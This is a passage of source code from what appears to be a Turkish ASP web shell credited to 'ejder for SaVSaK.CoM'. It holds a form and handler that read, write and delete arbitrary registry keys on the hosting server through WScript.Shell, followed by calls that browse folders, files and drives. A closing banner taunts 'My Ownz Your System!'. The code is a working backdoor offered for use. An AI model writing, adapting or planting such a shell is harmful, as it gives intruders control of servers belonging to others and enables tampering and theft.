yazsol("<table><tr><td>Root Key Name</td><td>Karşılığı</td></tr><tr><td>HKEY_CURRENT_USER</td><td>HKCU</td></tr><tr><td>HKEY_LOCAL_MACHINE</td><td> HKLM </td></tr><tr><td>HKEY_CLASSES_ROOT</td><td>HKCR</td></tr><tr><td>HKEY_USERS</td><td>HKEY_USERS </td></tr><tr><td>HKEY_CURRENT_CONFIG</td><td>HKEY_CURRENT_CONFIG </td></tr></table>")
yazsol("REG_SZ -> String(kelime) / REG_DWORD -> İnteger(Sayı) / REG_BINARY -> Binary / REG_EXPAND_SZ -> Multi String / REG_MULTI_SZ -> Aeeay String")
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<br><b>Register lardan OKUMA & SİL by SaVSaK.CoM ;)</b>")
yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='oku' type='hidden'><b>Mevki/Key : </b><input name=""hash5"" type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\SaVSAK_CoM)")
yazorta("<input value='oku' name='hash6' type='radio' checked> OKU  -  <input value='sil' name='hash6' type='radio'> SİL &nbsp;&nbsp;&nbsp;&nbsp;  <input name='SaVSA_K_CoM_' value='..:: OKU/SİL ::..' type='Submit'>")
response.write "</td></form></tr></table>"
on error resume next
Set SaVSaK = Server.CreateObject("WScript.Shell")
    if err <> 0 then
        olmadi("Server da WScript.SHell kullanımına İzin vermemektedir. İşlem başarısız. SaVSaK.CoM")
        response.end()
    end if
if inject2 = "yaz" then
    on error resume next
    Select Case CInt(hash4)
        Case 1
            hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_SZ")
        Case 2
            hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_DWORD")
        Case 3
            hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_BINARY")
        Case 4
            hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_EXPAND_SZ")
        Case 5
            hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_MULTI_SZ")
    End Select
    if err <> 0 then
        olmadi("İşlem  gerçekleştirilemedi. VALUE değerinin doğru ve uygun Value giridğinziden emin ol.")
    else
        oldu(" <b>"+hash2+"</b><br> adresine register yazıldı. ")
    end if

else if inject2 = "oku" then
    if hash6 = "oku" then
        yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
        on error resume next
        response.write "<center>Değer/Value: <b>"
        response.write SaVSaK.RegRead (Trim(hash5))
        response.write "</b></center>"
        if err<>0 then
            olmadi("Kayıt Register larda bulunamadı...")
        end if        
    else if hash6 = "sil" then
        yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
        on error resume next
        hash9 = SaVSaK.RegDelete (Trim(hash5))
        if err<>0 then
            olmadi("Registerlardan Silinemedi. KEy yanlış olabilir. yada kayıt bulanamadı.")
        else
            oldu("Başarıyla Silindi. ")
        end if
    end if 
    end if

end if
end if
yazortaa("<b>Written by ejder for SaVSaK.CoM</b>")


END SELECT


if popup = False AND nolist = False then
response.write "<br><br>"
response.write "<div  style=""z-index:150; position:absolute"">"
Call KlasorOku()
response.write "</div><div  align=""right"">"
Call DosyaOku()
response.write "</div>"
end if

if popup = False then
response.write "<br><br><center><table cellpadding=""0"" cellspacing=""0"" width=""160"">"
response.write "<tr><td class=""kbrtm"" height=""20"" style=""background-color:121212"" align=""center""><b>Sürücüler</b></td></tr>"
Call Suruculer
response.write "</table></center><br><br>"
Call SurucuInfo
yazortaa("<b>Written<a href=""mailto:[email protected]"">By_ejder</a> Says; My Ownz Your System! But You Are Still N0t Here! L0L : ) </a></b>")
end if
%>